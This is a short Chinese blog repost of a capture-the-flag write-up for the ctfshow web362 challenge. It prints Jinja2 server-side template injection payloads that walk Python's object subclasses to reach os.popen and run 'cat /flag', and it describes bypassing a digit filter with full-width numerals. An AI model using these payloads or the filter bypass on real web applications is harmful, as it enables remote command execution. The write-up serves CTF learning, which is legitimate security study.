当前位置:   article > 正文

ctfshow-web362(SSTI)

web362

?name={{"".__class__.__bases__[0].__subclasses__()}}

 一直到这一步都是正常的

  从12开始就没用了

数字出现了问题,看wp用全角数字代替正常数字绕过

?name={{"".__class__.__bases__[0].__subclasses__()[132]}}

 然后应该可以用正常方法做了

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号